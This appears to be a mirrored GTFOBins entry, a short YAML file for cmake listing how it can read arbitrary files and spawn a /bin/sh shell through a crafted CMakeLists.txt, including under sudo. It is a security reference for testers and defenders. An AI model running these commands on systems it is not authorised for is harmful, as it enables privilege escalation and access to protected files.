mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
17 lines
291 B
Plaintext
17 lines
291 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- code: |-
|
|
cmake -E cat /path/to/input-file
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt
|
|
cmake /path/to/
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|